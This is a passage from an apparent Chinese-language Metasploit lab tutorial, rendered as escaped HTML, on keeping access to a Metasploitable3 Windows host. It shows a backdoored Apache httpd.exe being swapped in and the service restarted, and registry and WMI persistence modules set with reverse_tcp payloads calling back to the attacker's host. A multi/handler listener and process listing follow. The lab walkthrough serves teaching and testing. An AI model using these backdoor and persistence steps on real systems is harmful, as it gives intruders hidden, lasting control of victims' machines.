                                                                                        meterpreter > cd C:<\/span>\\\\wamp\\\\bin\\\\apache\\\\apache2.2<\/span>.21<\/span>\\\\bin\\\\<\/div>\n<\/div>\n<\/li>\n
                                                                                      5. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        meterpreter > mv httpd.exe httpd.exe.backup<\/div>\n<\/div>\n<\/li>\n
                                                                                      6. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        meterpreter > upload \/root\/<\/span>httpd-backdoored.exe<\/div>\n<\/div>\n<\/li>\n
                                                                                      7. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        [*] uploading :<\/span> \/root\/<\/span>httpd-backdoored.exe -> httpd-backdoored.exe<\/div>\n<\/div>\n<\/li>\n
                                                                                      8. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        [*] Uploaded 28.50<\/span> KiB of 28.50<\/span> KiB (100.0<\/span>%): \/root\/<\/span>httpd-backdoored.exe -> httpd-backdoored.exe<\/div>\n<\/div>\n<\/li>\n
                                                                                      9. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        [*] uploaded :<\/span> \/root\/<\/span>httpd-backdoored.exe -> httpd-backdoored.exe<\/div>\n<\/div>\n<\/li>\n
                                                                                      10. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        meterpreter > mv httpd-backdoored.exe httpd.exe<\/div>\n<\/div>\n<\/li>\n
                                                                                      11. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        meterpreter ><\/div>\n<\/div>\n<\/li>\n
                                                                                      12. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n<\/li>\n
                                                                                      13. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                        <\/code><\/pre>\n
                                                                                        6\u3001\u4f7f\u7528shell<\/code>\u547d\u4ee4\u8fdb\u5165\u76ee\u6807\u7cfb\u7edf\u7684shell<\/code>,\u91cd\u542fwampapache<\/code>\u670d\u52a1\u3002<\/p>\n
                                                                                        <\/code><\/pre>\n
                                                                                          \n
                                                                                        1. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          meterpreter<\/span> > shell<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        2. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          Process<\/span> 1976 created.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        3. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          Channel<\/span> 3 created.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        4. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          Microsoft<\/span> Windows [Version 6.1.7601]<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        5. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          Copyright<\/span> (c) 2009 Microsoft Corporation. All rights reserved.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        6. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n<\/li>\n
                                                                                        7. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          C<\/span>:\\wamp\\bin\\apache\\apache2.2.21\\bin>net stop wampapache<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        8. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          net<\/span> stop wampapache<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        9. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          The<\/span> wampapache service is stopping.net sta<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        10. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          The<\/span> wampapache service was stopped successfully.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        11. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          C<\/span>:\\wamp\\bin\\apache\\apache2.2.21\\bin>net start wampapache<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        12. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n<\/li>\n
                                                                                        13. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          [*]<\/span> Sending stage (206403 bytes) to 192.168.177.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        14. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          net<\/span> start wampapache<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        15. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          The<\/span> wampapache service is starting.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        16. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          The<\/span> wampapache service was started successfully.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                        17. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n<\/li>\n
                                                                                        18. \n
                                                                                          \n
                                                                                          <\/div>\n<\/div>\n
                                                                                          \n
                                                                                          \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                          <\/code><\/pre>\n
                                                                                          \u4f60\u4f1a\u53d1\u73b0\uff0c\u670d\u52a1\u542f\u52a8\u540e\uff0c\u8fd4\u56de\u4e86\u65b0\u7684\u4f1a\u8bdd<\/p>\n
                                                                                          <\/code><\/pre>\n
                                                                                            \n
                                                                                          1. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            C:\\wamp\\bin\\apache\\apache2.2.21\\bin>[*]<\/span> Meterpreter<\/span> session<\/span> 4<\/span> opened<\/span> (192.168.177.143:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:63068)<\/span> at<\/span> 2019-04-28 10:32:44<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          2. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            [*<\/span>] Sending<\/span> stage<\/span> (206403<\/span> bytes)<\/span> to<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          3. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            [*<\/span>] Meterpreter<\/span> session<\/span> 5<\/span> opened<\/span> (192.168.177.143:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:63069)<\/span> at<\/span> 2019-04-28 10:32:59<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          4. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            ....<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          5. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            msf5<\/span> exploit(multi\/handler)<\/span> ><\/span> sessions<\/span> -l<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          6. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n<\/li>\n
                                                                                          7. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            Active<\/span> sessions<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          8. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            ===============<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          9. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n<\/li>\n
                                                                                          10. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            Id<\/span> Name<\/span> Type<\/span> Information<\/span> Connection<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          11. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            --<\/span> ----<\/span> ----<\/span> -----------<\/span> ----------<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          12. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            3<\/span> meterpreter<\/span> x86\/windows<\/span> NT<\/span> AUTHORITY\\SYSTEM<\/span> @<\/span> METASPLOITABLE3<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:62506<\/span> (192.168.177.144)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          13. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            4<\/span> meterpreter<\/span> x64\/windows<\/span> NT<\/span> AUTHORITY\\LOCAL<\/span> SERVICE<\/span> @<\/span> METASPLOITABLE3<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:63068<\/span> (192.168.177.144)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          14. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            5<\/span> meterpreter<\/span> x64\/windows<\/span> NT<\/span> AUTHORITY\\LOCAL<\/span> SERVICE<\/span> @<\/span> METASPLOITABLE3<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:63069<\/span> (192.168.177.144)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          15. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n<\/li>\n
                                                                                          16. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            msf5<\/span> exploit(multi\/handler)<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                          17. \n
                                                                                            \n
                                                                                            <\/div>\n<\/div>\n
                                                                                            \n
                                                                                            \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                            <\/code><\/pre>\n
                                                                                            7\u3001\u4f7f\u7528Windows<\/code>\u6ce8\u518c\u8868\u6301\u4e45\u5316\u6a21\u5757\u690d\u5165\u540e\u95e8\u3002\u6211\u4eec\u5229\u7528\u6c38\u6052\u4e4b\u84dd\u653b\u51fb\u83b7\u5f97\u7684\u4f1a\u8bdd\u8fdb\u884c\u540e\u95e8\u690d\u5165\u64cd\u4f5c\u3002<\/p>\n
                                                                                            <\/code><\/pre>\n
                                                                                              \n
                                                                                            1. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              msf5 exploit(windows\/smb\/ms17_010_eternalblue) > use exploit\/windows\/local<\/span>\/registry_persistence<\/div>\n<\/div>\n<\/li>\n
                                                                                            2. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              smsf5 exploit(windows\/local<\/span>\/registry_persistence) > set<\/span> SESSION 6<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                            3. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              SESSION => 6<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                            4. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              msf5 exploit(windows\/local<\/span>\/registry_persistence) > set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n
                                                                                            5. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              PAYLOAD => windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n
                                                                                            6. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              msf5 exploit(windows\/local<\/span>\/registry_persistence) > set<\/span> LHOST 192.168<\/span>.177.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                            7. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              LHOST => 192.168<\/span>.177.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                            8. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              msf5 exploit(windows\/local<\/span>\/registry_persistence) > set<\/span> LPORT 9999<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                            9. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              msf5 exploit(windows\/local<\/span>\/registry_persistence) > exploit<\/div>\n<\/div>\n<\/li>\n
                                                                                            10. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n<\/li>\n
                                                                                            11. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              [*] Generating payload blob..<\/div>\n<\/div>\n<\/li>\n
                                                                                            12. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              [+] Generated payload, 5944<\/span> bytes<\/div>\n<\/div>\n<\/li>\n
                                                                                            13. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              [*] Root path is<\/span> HKCU<\/div>\n<\/div>\n<\/li>\n
                                                                                            14. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              [*] Installing payload blob..<\/div>\n<\/div>\n<\/li>\n
                                                                                            15. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              [+] Created registry key HKCU\\Software\\cPH3pG4G<\/div>\n<\/div>\n<\/li>\n
                                                                                            16. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              [+] Installed payload blob to<\/span> HKCU\\Software\\cPH3pG4G\\q3jhQYTs<\/div>\n<\/div>\n<\/li>\n
                                                                                            17. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              [*] Installing run key<\/div>\n<\/div>\n<\/li>\n
                                                                                            18. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              [-] Exploit aborted due to<\/span> failure: unknown: Could not<\/span> install run key<\/div>\n<\/div>\n<\/li>\n
                                                                                            19. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              msf5 exploit(windows\/local<\/span>\/registry_persistence) ><\/div>\n<\/div>\n<\/li>\n
                                                                                            20. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n<\/li>\n
                                                                                            21. \n
                                                                                              \n
                                                                                              <\/div>\n<\/div>\n
                                                                                              \n
                                                                                              \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                              <\/code><\/pre>\n
                                                                                              \u8fd9\u91cc\u56e0\u4e3a\u73af\u5883\u95ee\u9898\uff0c\u5e76\u672a\u690d\u5165\u6210\u529f\u3002<\/p>\n
                                                                                              8\u3001\u5982\u679c\u6210\u529f\uff0c\u7136\u540e\u5c31\u53ef\u4ee5\u8bbe\u7f6e\u76d1\u542c\uff0c\u4ee5\u4fbf\u76ee\u6807\u91cd\u542f\u7684\u65f6\u5019\u83b7\u5f97\u53cd\u5411shell<\/code>\u4f1a\u8bdd<\/p>\n
                                                                                              <\/code><\/pre>\n
                                                                                                \n
                                                                                              1. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                msf5 exploit(multi\/handler<\/span>) > set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n
                                                                                              2. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                PAYLOAD => windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n
                                                                                              3. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                msf5 exploit(multi\/handler<\/span>) > set<\/span> LHOST 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                              4. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                LHOST => 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                              5. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                msf5 exploit(multi\/handler<\/span>) > set<\/span> LPORT 9999<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                              6. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                LPORT => 9999<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                              7. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                msf5 exploit(multi\/handler<\/span>) > exploit -j<\/div>\n<\/div>\n<\/li>\n
                                                                                              8. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                [*] Exploit running as<\/span> background job 1.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                              9. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                [*] Exploit completed, but no<\/span> session<\/span> was created.<\/div>\n<\/div>\n<\/li>\n
                                                                                              10. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n<\/li>\n
                                                                                              11. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                [*] Started reverse<\/span> TCP handler<\/span> on<\/span> 192.168<\/span>.177<\/span>.143<\/span>:9999<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                              12. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                msf5 exploit(multi\/handler<\/span>) ><\/div>\n<\/div>\n<\/li>\n
                                                                                              13. \n
                                                                                                \n
                                                                                                <\/div>\n<\/div>\n
                                                                                                \n
                                                                                                \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                                <\/code><\/pre>\n
                                                                                                9\u3001\u5f53\u76ee\u6807\u673a\u5668\u91cd\u542f\u540e\uff0c\u53ef\u4ee5\u83b7\u5f97\u4f1a\u8bdd<\/p>\n
                                                                                                <\/code><\/pre>\n
                                                                                                  \n
                                                                                                1. \n
                                                                                                  \n
                                                                                                  <\/div>\n<\/div>\n
                                                                                                  \n
                                                                                                  meterpreter<\/span> > reboot<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                2. \n
                                                                                                  \n
                                                                                                  <\/div>\n<\/div>\n
                                                                                                  \n
                                                                                                  Rebooting...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                3. \n
                                                                                                  \n
                                                                                                  <\/div>\n<\/div>\n
                                                                                                  \n
                                                                                                  <\/div>\n<\/div>\n<\/li>\n
                                                                                                4. \n
                                                                                                  \n
                                                                                                  <\/div>\n<\/div>\n
                                                                                                  \n
                                                                                                  \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                                  <\/code><\/pre>\n
                                                                                                  10\u3001\u5229\u7528WMI<\/code>\u4e8b\u4ef6\u8ba2\u9605\u521b\u5efa\u65e0\u6587\u4ef6\u540e\u95e8<\/p>\n
                                                                                                  <\/code><\/pre>\n
                                                                                                    \n
                                                                                                  1. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    msf5 exploit(windows\/smb\/ms17_010_eternalblue) > use exploit\/windows\/local<\/span>\/wmi_persistence<\/div>\n<\/div>\n<\/li>\n
                                                                                                  2. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    msf5 exploit(windows\/local<\/span>\/wmi_persistence) > set<\/span> SESSION 1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  3. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    SESSION => 1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  4. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    msf5 exploit(windows\/local<\/span>\/wmi_persistence) > set<\/span> CALLBACK_INTERVAL 60000<\/span> \/\/\u8bbe\u7f6e\u56de\u8c03\u65f6\u95f4\u4e3a1\u5206\u949f<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  5. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    CALLBACK_INTERVAL => 60000<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  6. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    msf5 exploit(windows\/local<\/span>\/wmi_persistence) > set<\/span> EVENT_ID_TRIGGER 4624<\/span> \/\/\u8bbe\u7f6e\u4e8b\u4ef6ID<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  7. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    EVENT_ID_TRIGGER => 4624<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  8. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    msf5 exploit(windows\/local<\/span>\/wmi_persistence) > set<\/span> USERNAME_TRIGGER Administrator \/\/\u8bbe\u7f6e\u7528\u6237<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  9. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    USERNAME_TRIGGER => Administrator<\/div>\n<\/div>\n<\/li>\n
                                                                                                  10. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    msf5 exploit(windows\/local<\/span>\/wmi_persistence) > set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n
                                                                                                  11. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    PAYLOAD => windows\/meterpreter\/reverse_tcp<\/div>\n<\/div>\n<\/li>\n
                                                                                                  12. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    smsf5 exploit(windows\/local<\/span>\/wmi_persistence) > set<\/span> LHOST 192.168<\/span>.177.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  13. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    LHOST => 192.168<\/span>.177.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  14. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    msf5 exploit(windows\/local<\/span>\/wmi_persistence) > set<\/span> LPORT 4433<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  15. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    LPORT => 4433<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                  16. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    msf5 exploit(windows\/local<\/span>\/wmi_persistence) > exploit<\/div>\n<\/div>\n<\/li>\n
                                                                                                  17. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n<\/li>\n
                                                                                                  18. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    [-] This module cannot run as<\/span> System<\/div>\n<\/div>\n<\/li>\n
                                                                                                  19. \n
                                                                                                    \n
                                                                                                    <\/div>\n<\/div>\n
                                                                                                    \n
                                                                                                    \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                                    <\/code><\/pre>\n
                                                                                                    11\u3001\u63d0\u793a\u672a\u6210\u529f\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528migrate<\/code>\u5c06meterpreter shell<\/code>\u8fdb\u7a0b\u8fdb\u884c\u8fdb\u7a0b\u8fc1\u79fb\uff0c\u5c31\u662f\u5c06meterpreter shell<\/code>\u8fdb\u7a0b\u8fc1\u79fb\u5230\u76f8\u5bf9\u7a33\u5b9a\u5e94\u7528\u7684\u8fdb\u7a0b\u91cc\u3002<\/p>\n
                                                                                                    <\/code><\/pre>\n
                                                                                                      \n
                                                                                                    1. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      msf5<\/span> exploit(windows\/local\/wmi_persistence)<\/span> ><\/span> sessions<\/span> -i<\/span> 1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    2. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      [*<\/span>] Starting<\/span> interaction<\/span> with<\/span> 1<\/span>...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    3. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n<\/li>\n
                                                                                                    4. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      meterpreter<\/span> ><\/span> ps<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    5. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n<\/li>\n
                                                                                                    6. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      Process<\/span> List<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    7. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      ============<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    8. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n<\/li>\n
                                                                                                    9. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      PID<\/span> PPID<\/span> Name<\/span> Arch<\/span> Session<\/span> User<\/span> Path<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    10. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      ---<\/span> ----<\/span> ----<\/span> ----<\/span> -------<\/span> ----<\/span> ----<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    11. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      0<\/span> 0<\/span> [System<\/span> Process<\/span>]<\/div>\n<\/div>\n<\/li>\n
                                                                                                    12. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      4<\/span> 0<\/span> System<\/span> x64<\/span> 0<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    13. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      232<\/span> 4<\/span> smss.exe<\/span> x64<\/span> 0<\/span> NT<\/span> AUTHORITY\\SYSTEM<\/span> \\SystemRoot\\System32\\smss.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    14. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      300<\/span> 472<\/span> svchost.exe<\/span> x64<\/span> 0<\/span> NT<\/span> AUTHORITY\\NETWORK<\/span> SERVICE<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    15. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      316<\/span> 304<\/span> csrss.exe<\/span> x64<\/span> 0<\/span> NT<\/span> AUTHORITY\\SYSTEM<\/span> C:\\Windows\\system32\\csrss.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    16. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      324<\/span> 5624 <\/span>explorer.exe<\/span> x64<\/span> 1<\/span> METASPLOITABLE3\\vagrant<\/span> C:\\Windows\\Explorer.EXE<\/span><\/div>\n<\/div>\n<\/li>\n
